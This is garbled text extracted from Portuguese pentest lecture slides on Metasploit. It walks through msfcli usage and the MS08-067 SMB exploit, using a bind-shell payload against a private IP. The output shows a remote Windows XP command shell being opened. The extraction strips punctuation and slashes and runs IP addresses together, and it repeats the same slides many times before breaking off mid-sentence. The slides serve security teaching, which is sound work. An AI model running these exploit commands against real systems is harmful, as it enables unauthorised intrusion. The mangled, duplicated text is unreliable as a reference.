PENTEST
Cerutti ndash IESGF - 2014
Pentester antigo
bull Facilidades pela novidadebull Departamentos natildeo estavam preparados ebull Acontecia facilmente
Hoje
Fases dos testes de PTEST
1 Interaccedilotildees Pre-contrataccedilatildeo2 Acumulo de Inteligencia 3 Modelagem das ameaccedilas4 Anaacutelise das vulnerabilidades5 Exploitation6 Post Exploitation7 Relatoacuterios
Metasploit ndash explorando vulnerabilidades
bull 1048698 Donrsquot be maliciousbull 1048698 Donrsquot be stupidbull 1048698 Donrsquot attack targets without written
permissionbull 1048698 Consider the consequences of your actionsbull 1048698 If you do things illegally you can be caught
and put in jail
Metasploit
Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect
msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3
Sample Usage
rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)
You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree
Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE
PROMPT WINDOWS REMOTO
rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful
Running Armitage
To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage
Acumulando o reconhecimento do ambiente
Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode
danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o
ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS
quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute
rastrear teus passos depois do evento
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM
Pentester antigo
bull Facilidades pela novidadebull Departamentos natildeo estavam preparados ebull Acontecia facilmente
Hoje
Fases dos testes de PTEST
1 Interaccedilotildees Pre-contrataccedilatildeo2 Acumulo de Inteligencia 3 Modelagem das ameaccedilas4 Anaacutelise das vulnerabilidades5 Exploitation6 Post Exploitation7 Relatoacuterios
Metasploit ndash explorando vulnerabilidades
bull 1048698 Donrsquot be maliciousbull 1048698 Donrsquot be stupidbull 1048698 Donrsquot attack targets without written
permissionbull 1048698 Consider the consequences of your actionsbull 1048698 If you do things illegally you can be caught
and put in jail
Metasploit
Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect
msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3
Sample Usage
rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)
You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree
Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE
PROMPT WINDOWS REMOTO
rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful
Running Armitage
To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage
Acumulando o reconhecimento do ambiente
Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode
danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o
ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS
quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute
rastrear teus passos depois do evento
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM
Hoje
Fases dos testes de PTEST
1 Interaccedilotildees Pre-contrataccedilatildeo2 Acumulo de Inteligencia 3 Modelagem das ameaccedilas4 Anaacutelise das vulnerabilidades5 Exploitation6 Post Exploitation7 Relatoacuterios
Metasploit ndash explorando vulnerabilidades
bull 1048698 Donrsquot be maliciousbull 1048698 Donrsquot be stupidbull 1048698 Donrsquot attack targets without written
permissionbull 1048698 Consider the consequences of your actionsbull 1048698 If you do things illegally you can be caught
and put in jail
Metasploit
Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect
msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3
Sample Usage
rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)
You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree
Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE
PROMPT WINDOWS REMOTO
rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful
Running Armitage
To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage
Acumulando o reconhecimento do ambiente
Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode
danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o
ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS
quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute
rastrear teus passos depois do evento
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM
Fases dos testes de PTEST
1 Interaccedilotildees Pre-contrataccedilatildeo2 Acumulo de Inteligencia 3 Modelagem das ameaccedilas4 Anaacutelise das vulnerabilidades5 Exploitation6 Post Exploitation7 Relatoacuterios
Metasploit ndash explorando vulnerabilidades
bull 1048698 Donrsquot be maliciousbull 1048698 Donrsquot be stupidbull 1048698 Donrsquot attack targets without written
permissionbull 1048698 Consider the consequences of your actionsbull 1048698 If you do things illegally you can be caught
and put in jail
Metasploit
Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect
msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3
Sample Usage
rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)
You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree
Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE
PROMPT WINDOWS REMOTO
rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful
Running Armitage
To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage
Acumulando o reconhecimento do ambiente
Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode
danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o
ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS
quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute
rastrear teus passos depois do evento
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM
Metasploit ndash explorando vulnerabilidades
bull 1048698 Donrsquot be maliciousbull 1048698 Donrsquot be stupidbull 1048698 Donrsquot attack targets without written
permissionbull 1048698 Consider the consequences of your actionsbull 1048698 If you do things illegally you can be caught
and put in jail
Metasploit
Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect
msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3
Sample Usage
rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)
You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree
Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE
PROMPT WINDOWS REMOTO
rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful
Running Armitage
To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage
Acumulando o reconhecimento do ambiente
Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode
danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o
ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS
quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute
rastrear teus passos depois do evento
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM
Metasploit
Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect
msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3
Sample Usage
rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)
You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree
Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE
PROMPT WINDOWS REMOTO
rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful
Running Armitage
To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage
Acumulando o reconhecimento do ambiente
Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode
danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o
ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS
quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute
rastrear teus passos depois do evento
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM
msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3
Sample Usage
rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)
You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree
Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE
PROMPT WINDOWS REMOTO
rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful
Running Armitage
To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage
Acumulando o reconhecimento do ambiente
Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode
danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o
ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS
quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute
rastrear teus passos depois do evento
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM
Sample Usage
rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)
You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree
Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE
PROMPT WINDOWS REMOTO
rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful
Running Armitage
To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage
Acumulando o reconhecimento do ambiente
Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode
danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o
ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS
quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute
rastrear teus passos depois do evento
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM
You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree
Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE
PROMPT WINDOWS REMOTO
rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful
Running Armitage
To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage
Acumulando o reconhecimento do ambiente
Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode
danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o
ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS
quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute
rastrear teus passos depois do evento
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM
Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE
PROMPT WINDOWS REMOTO
rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful
Running Armitage
To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage
Acumulando o reconhecimento do ambiente
Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode
danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o
ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS
